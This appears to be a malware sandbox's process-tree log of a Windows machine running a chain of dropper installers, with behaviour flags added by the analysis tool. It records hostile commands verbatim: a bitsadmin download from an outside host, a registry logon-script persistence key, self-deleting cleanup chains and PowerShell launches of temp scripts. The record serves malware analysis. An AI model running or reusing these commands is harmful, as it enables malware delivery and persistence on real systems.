C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2528 /prefetch:15⤵PID:3516
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2620 /prefetch:15⤵PID:5800
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=2016 /prefetch:85⤵PID:6808
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=2004 /prefetch:85⤵PID:6228
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1928 /prefetch:25⤵PID:4964
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=3268 /prefetch:85⤵PID:7764
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1928 /prefetch:25⤵PID:7956
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=3312 /prefetch:85⤵PID:7956
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=1900 /prefetch:85⤵PID:5044
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=1820 /prefetch:85⤵PID:7036
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=2900 /prefetch:85⤵PID:7500
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\x7X0Exp5JXLQiSV9Bd8veIvG.exe"C:\Users\Admin\Pictures\Adobe Films\x7X0Exp5JXLQiSV9Bd8veIvG.exe"2⤵
- Executes dropped EXE
PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\is-DGEAD.tmp\x7X0Exp5JXLQiSV9Bd8veIvG.tmp"C:\Users\Admin\AppData\Local\Temp\is-DGEAD.tmp\x7X0Exp5JXLQiSV9Bd8veIvG.tmp" /SL5="$7003A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\x7X0Exp5JXLQiSV9Bd8veIvG.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
PID:4212 -
C:\Users\Admin\AppData\Local\Temp\is-HNQSA.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-HNQSA.tmp\DYbALA.exe" /S /UID=27102⤵
- Executes dropped EXE
PID:4148 -
C:\Program Files\Mozilla Firefox\AMTMFOCQMW\foldershare.exe"C:\Program Files\Mozilla Firefox\AMTMFOCQMW\foldershare.exe" /VERYSILENT3⤵
- Executes dropped EXE
PID:5220
-
-
C:\Users\Admin\AppData\Local\Temp\be-4394e-205-9eba5-f133f0011a784\Wysadudaecu.exe"C:\Users\Admin\AppData\Local\Temp\be-4394e-205-9eba5-f133f0011a784\Wysadudaecu.exe"3⤵
- Executes dropped EXE
PID:5776
-
-
C:\Users\Admin\AppData\Local\Temp\36-7c6f5-6bf-62795-996f3971620a5\Mipijaedila.exe"C:\Users\Admin\AppData\Local\Temp\36-7c6f5-6bf-62795-996f3971620a5\Mipijaedila.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5012 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit4⤵PID:4464
-
C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exeC:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exe SID=778 CID=778 SILENT=1 /quiet5⤵PID:6580
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654211 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"6⤵PID:7776
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v1dgzhby.heg\GcleanerEU.exe /eufive & exit4⤵PID:916
-
C:\Users\Admin\AppData\Local\Temp\v1dgzhby.heg\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\v1dgzhby.heg\GcleanerEU.exe /eufive5⤵PID:6560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cmwvfgqr.pbs\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:3268
-
C:\Users\Admin\AppData\Local\Temp\cmwvfgqr.pbs\installer.exeC:\Users\Admin\AppData\Local\Temp\cmwvfgqr.pbs\installer.exe /qn CAMPAIGN="654"5⤵PID:6780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uwmc5y1e.ba2\any.exe & exit4⤵PID:6352
-
C:\Users\Admin\AppData\Local\Temp\uwmc5y1e.ba2\any.exeC:\Users\Admin\AppData\Local\Temp\uwmc5y1e.ba2\any.exe5⤵PID:6188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\by5insby.q0n\customer51.exe & exit4⤵PID:6452
-
C:\Users\Admin\AppData\Local\Temp\by5insby.q0n\customer51.exeC:\Users\Admin\AppData\Local\Temp\by5insby.q0n\customer51.exe5⤵PID:4632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qb4gjppl.s22\gcleaner.exe /mixfive & exit4⤵PID:6652
-
C:\Users\Admin\AppData\Local\Temp\qb4gjppl.s22\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\qb4gjppl.s22\gcleaner.exe /mixfive5⤵PID:6848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 8886⤵
- Program crash
PID:4216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 8046⤵
- Program crash
PID:8028
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exe /verysilent & exit4⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exeC:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exe /verysilent5⤵PID:6040
-
C:\Users\Admin\AppData\Local\Temp\is-AT8K8.tmp\FastPC.tmp"C:\Users\Admin\AppData\Local\Temp\is-AT8K8.tmp\FastPC.tmp" /SL5="$10506,138429,56832,C:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exe" /verysilent6⤵PID:1252
-
C:\Users\Admin\AppData\Local\Temp\is-PLUG3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PLUG3.tmp\Setup.exe" /Verysilent7⤵PID:7488
-
C:\Program Files (x86)\FastPc\FastPc\Fast.exe"C:\Program Files (x86)\FastPc\FastPc\Fast.exe"8⤵PID:7656
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Fast.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\FastPc\FastPc\Fast.exe" & del C:\ProgramData\*.dll & exit9⤵PID:6632
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Fast.exe /f10⤵
- Kills process with taskkill
PID:7096
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 610⤵
- Delays execution with timeout.exe
PID:8816
-
-
-
-
C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"8⤵PID:7524
-
-
C:\Program Files (x86)\FastPc\FastPc\Faster.exe"C:\Program Files (x86)\FastPc\FastPc\Faster.exe"8⤵PID:7220
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"9⤵PID:4568
-
-
C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe"C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7219⤵PID:6328
-
C:\Users\Admin\AppData\Local\Temp\is-SK6CP.tmp\IBInstaller_74449.tmp"C:\Users\Admin\AppData\Local\Temp\is-SK6CP.tmp\IBInstaller_74449.tmp" /SL5="$601B0,17039402,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 72110⤵PID:4564
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\microsoft.cab -F:* %ProgramData%11⤵PID:2036
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\microsoft.cab -F:* C:\ProgramData12⤵PID:6472
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f11⤵PID:8716
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f12⤵PID:7544
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\vdi_compiler"11⤵PID:4444
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\vdi_compiler.exe"12⤵PID:5104
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 413⤵
- Runs ping.exe
PID:4148
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://coeplorfd234.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=72111⤵PID:8756
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"11⤵PID:9196
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=7209⤵PID:8660
-
C:\Users\Admin\AppData\Local\Temp\is-NTV87.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-NTV87.tmp\vpn.tmp" /SL5="$306A4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=72010⤵PID:8456
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "11⤵PID:7496
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090112⤵PID:3684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "11⤵PID:2224
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090112⤵PID:1796
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall11⤵PID:8736
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install11⤵PID:6492
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Settings Installation.exe"C:\Users\Admin\AppData\Local\Temp\Settings Installation.exe" SID=775 SID CID=775 SILENT=1 /quiet9⤵PID:2028
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zn2v1xe5.cdx\autosubplayer.exe /S & exit4⤵PID:7112
-
C:\Users\Admin\AppData\Local\Temp\zn2v1xe5.cdx\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\zn2v1xe5.cdx\autosubplayer.exe /S5⤵PID:6648
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵PID:7620
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵PID:8460
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵PID:6152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵PID:8596
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵PID:6724
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵PID:8564
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵PID:9200
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z6⤵
- Download via BitsAdmin
PID:9160
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tjcjk1w5.bce\installer.exe /qn CAMPAIGN=654 & exit4⤵PID:6688
-
C:\Users\Admin\AppData\Local\Temp\tjcjk1w5.bce\installer.exeC:\Users\Admin\AppData\Local\Temp\tjcjk1w5.bce\installer.exe /qn CAMPAIGN=6545⤵PID:5980
-
-
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2460
-
C:\Users\Admin\AppData\Local\Temp\A53B.exeC:\Users\Admin\AppData\Local\Temp\A53B.exe1⤵PID:4312
-
C:\Users\Admin\AppData\Local\Temp\A53B.exeC:\Users\Admin\AppData\Local\Temp\A53B.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3952
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:5076
-
C:\Users\Admin\AppData\Local\Temp\379.exeC:\Users\Admin\AppData\Local\Temp\379.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4916
-
C:\Users\Admin\AppData\Local\Temp\19D1.exeC:\Users\Admin\AppData\Local\Temp\19D1.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6004
-
C:\Users\Admin\AppData\Local\Temp\252C.exeC:\Users\Admin\AppData\Local\Temp\252C.exe1⤵PID:3680
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4736
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5744
-
C:\Users\Admin\AppData\Local\Temp\73F9.exeC:\Users\Admin\AppData\Local\Temp\73F9.exe1⤵PID:6496
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵PID:1916
-
-
C:\Users\Admin\AppData\Local\Temp\8C54.exeC:\Users\Admin\AppData\Local\Temp\8C54.exe1⤵PID:6336
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Executes dropped EXE
PID:3680
-
-
C:\Users\Admin\AppData\Local\Temp\8C54.exeC:\Users\Admin\AppData\Local\Temp\8C54.exe2⤵PID:5880
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:5796
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\BCBC.exeC:\Users\Admin\AppData\Local\Temp\BCBC.exe1⤵PID:4860
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:6564
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 67DB4E2FF2F9B0DC520363B899A7DC2A C2⤵PID:5204
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 31901A814870663F6B6BC076BDF07041 C2⤵PID:2192
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 82A2BD7E8AB2A48BB1AE70481644416C2⤵PID:6400
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"2⤵PID:8064
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default3⤵PID:7584
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--loGQqfG2tg"4⤵PID:5184
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x2dc,0x2e0,0x2e4,0x2b8,0x2e8,0x7ffd79e3dec0,0x7ffd79e3ded0,0x7ffd79e3dee05⤵PID:4168
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=1872 /prefetch:85⤵PID:7784
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1824 /prefetch:25⤵PID:2988
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2708 /prefetch:15⤵PID:9060
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2676 /prefetch:15⤵PID:4336
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=2368 /prefetch:85⤵PID:8368
-
-
